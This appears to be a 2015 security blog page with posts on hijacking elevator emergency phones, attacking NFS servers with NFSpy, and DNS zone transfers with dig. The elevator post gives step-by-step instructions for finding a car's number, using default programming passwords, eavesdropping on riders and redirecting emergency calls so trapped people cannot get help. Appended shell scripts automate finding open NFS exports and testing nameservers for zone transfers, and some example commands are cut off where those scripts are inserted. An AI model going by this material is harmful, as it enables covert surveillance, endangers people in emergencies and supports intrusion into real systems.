Sep 13, 2015

Hijacking an Elevator Phone

If you have ever ridden in an elevator, you have probably seen (or even used) the emergency phone inside the car. By law, elevators are required to have some form of two-way communication, which usually means a device connected to a POTS (Plain Old Telephone Service) line or a PBX extension. It turns out these devices are easy to take over and use for malicious purposes.

Many elevator phones are programmable so that the same unit can serve different use cases at different locations. A lot of them can be programmed simply by calling the phone number assigned to the elevator phone.

How do we find the telephone number to the elevator phone?

Each phone usually has a standard telephone line (RJ-11) running to it, often in the machine room or a nearby closet. Find it and you can "borrow" that connection to learn the number of the elevator phone.

You can use a small corded telephone (or a lineman's test set) to connect to the phone line. Once connected, dial 1-800-444-4444. This number is a toll-free ANAC (Automatic Number Announcement Circuit) that reads back the phone number you are calling from; ANAC numbers come and go, so if this one no longer answers, any other working ANAC will do. Write the number down. Also note the manufacturer and model number of the elevator phone if you can find it.

Look up the documentation for that model and you will most likely find that it can be programmed simply by calling the number it is attached to. You will also find that it may ship with a default password for programming mode, such as 123456 or 35842#, which is rarely changed after installation. From there you can change the message it announces or even change the number it dials when the emergency button is pressed. Documentation example here.

How can this be used maliciously?

  1. Most elevator phones auto-answer when called. Find the phone number of the device, call it, and you are now listening to private conversations in the elevator car. This has obvious potential for corporate espionage.
  2. You can cause a denial of service by changing the number the elevator phone dials in an emergency, so that a trapped occupant never reaches help.
  3. You can pull a prank by changing the message it announces to people in the elevator car, or by changing the party the phone calls.
  4. Think of other things you can do with this, for example social engineering attacks against whoever answers the emergency call.

PS: Sometimes you can find the elevator phone's number written somewhere in the car by maintenance personnel.

Sep 09, 2015

DEFCON23 Presentation

So my DEFCON23 talk was given an early release onto the internet! I am excited, since many of you were eager to see it and I'd hate for you all to have to wait for the normal release schedule.

DEF CON 23 - Dennis Maldonado - Are We Really Safe? - Bypassing Access Control Systems

Sep 07, 2015

NFSpy - Attacking NFS Servers

I recently learned of the tool NFSpy, which can be used for attacking an NFS server.

nfspysh -o server=<ip/host>:<dir>

nfspysh -o server=
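The usual first step before pointing nfspysh at a server is to find out which exports exist and which of them any client may mount. The script below is an added example, not code from the original post or from the NFSpy project: it reads the output of showmount -e, keeps the exports whose client list is "*" or "(everyone)", and prints a ready-made nfspysh command for each. It assumes showmount and nfspysh are on PATH; the showmount output embedded in it is hand-constructed so the parsing can be exercised without a live target.

```shell
#!/bin/sh
# Added example (not from the original post): enumerate a target's NFS exports
# with showmount and print an nfspysh command for every export that is open to
# any client. Assumes showmount and nfspysh are on PATH; the sample output below
# is hand-constructed so the parsing runs without a live server.

# Read "showmount -e" output on stdin and print the paths of exports whose
# client list is "*" or "(everyone)", i.e. mountable from any address.
open_exports() {
    # The first line is the "Export list for <host>:" header.
    tail -n +2 | awk '$2 == "*" || $2 == "(everyone)" { print $1 }'
}

# Constructed sample of what showmount -e prints, used when no target is given.
SAMPLE_SHOWMOUNT='Export list for 192.0.2.10:
/export/home   *
/export/backup 10.0.0.0/24
/srv/www       (everyone)'

# Enumerate a live target and print one nfspysh invocation per open export.
# nfspysh chooses the uid/gid it presents in the AUTH_UNIX credentials, so an
# export like this can be read (and written, if exported rw) as any user;
# root_squash only keeps it from acting as uid 0.
enumerate_target() {
    target="$1"
    showmount -e "$target" | open_exports | while read -r export_path; do
        printf 'nfspysh -o server=%s:%s\n' "$target" "$export_path"
    done
}

if [ "$#" -gt 0 ]; then
    enumerate_target "$1"
else
    printf '%s\n' "$SAMPLE_SHOWMOUNT" | open_exports
fi
```

Run it with a target host as the only argument to print the nfspysh commands; with no argument it lists the open exports from the constructed sample. Exports restricted to a subnet (like /export/backup above) are skipped, since nfspysh cannot get past a client-address restriction on its own.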

Sep 05, 2015

Initiate zone transfer using Dig

Dig is a DNS lookup utility. You can use Dig to request a DNS zone transfer (AXFR) from a DNS server that allows it. This is useful for finding sensitive information such as internal hostnames, since a successful transfer hands you every record in the zone.

dig @<dnsserver> <domain> axfr

For example:

dig axfr
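A single dig command only tests one server, but a domain usually has several authoritative nameservers and any one of them may be misconfigured. The script below is an added example, not from the original post: it looks up the NS records for a domain, asks each server for an AXFR, and extracts the unique hostnames from whatever comes back. It assumes dig is on PATH; the AXFR output embedded in it is a hand-constructed copy of dig's output format so the parsing runs without network access.

```shell
#!/bin/sh
# Added example (not from the original post): try a zone transfer against every
# authoritative nameserver of a domain and list the hostnames a successful
# transfer reveals. Assumes dig is on PATH; the sample below is hand-constructed
# in dig's AXFR output format so the parsing runs without network access.

# Read dig AXFR output on stdin and print each unique owner name. Lines starting
# with ';' are dig's comments (including "; Transfer failed."), and every record
# line has the shape: name TTL IN TYPE rdata.
axfr_hosts() {
    grep -v '^;' | awk 'NF >= 5 && $3 == "IN" { print $1 }' | sort -u
}

# Constructed sample of a successful transfer for example.com.
SAMPLE_AXFR='; <<>> DiG 9.10.3 <<>> @ns1.example.com example.com axfr
;; global options: +cmd
example.com.      3600  IN  SOA  ns1.example.com. hostmaster.example.com. 2015090501 7200 3600 1209600 3600
example.com.      3600  IN  NS   ns1.example.com.
ns1.example.com.  3600  IN  A    192.0.2.53
www.example.com.  3600  IN  A    192.0.2.80
vpn.example.com.  3600  IN  A    192.0.2.100
example.com.      3600  IN  SOA  ns1.example.com. hostmaster.example.com. 2015090501 7200 3600 1209600 3600
;; Query time: 12 msec
;; XFR size: 6 records (messages 1, bytes 230)'

# Ask each NS for the zone. A server that refuses prints "; Transfer failed."
# and no records, so an empty hostname list means that server is closed.
try_axfr() {
    domain="$1"
    for ns in $(dig +short NS "$domain"); do
        hosts=$(dig @"$ns" "$domain" axfr +time=5 +tries=1 | axfr_hosts)
        if [ -n "$hosts" ]; then
            printf '[+] %s allows AXFR for %s:\n%s\n' "$ns" "$domain" "$hosts"
        else
            printf '[-] %s refused AXFR for %s\n' "$ns" "$domain"
        fi
    done
}

if [ "$#" -gt 0 ]; then
    try_axfr "$1"
else
    printf '%s\n' "$SAMPLE_AXFR" | axfr_hosts
fi
```

Run it with the domain as the only argument to test every nameserver; with no argument it prints the hostnames from the constructed sample. The owner-name filter deliberately keeps records of every type, since NS, MX and CNAME targets often point at hosts that have no A record of their own.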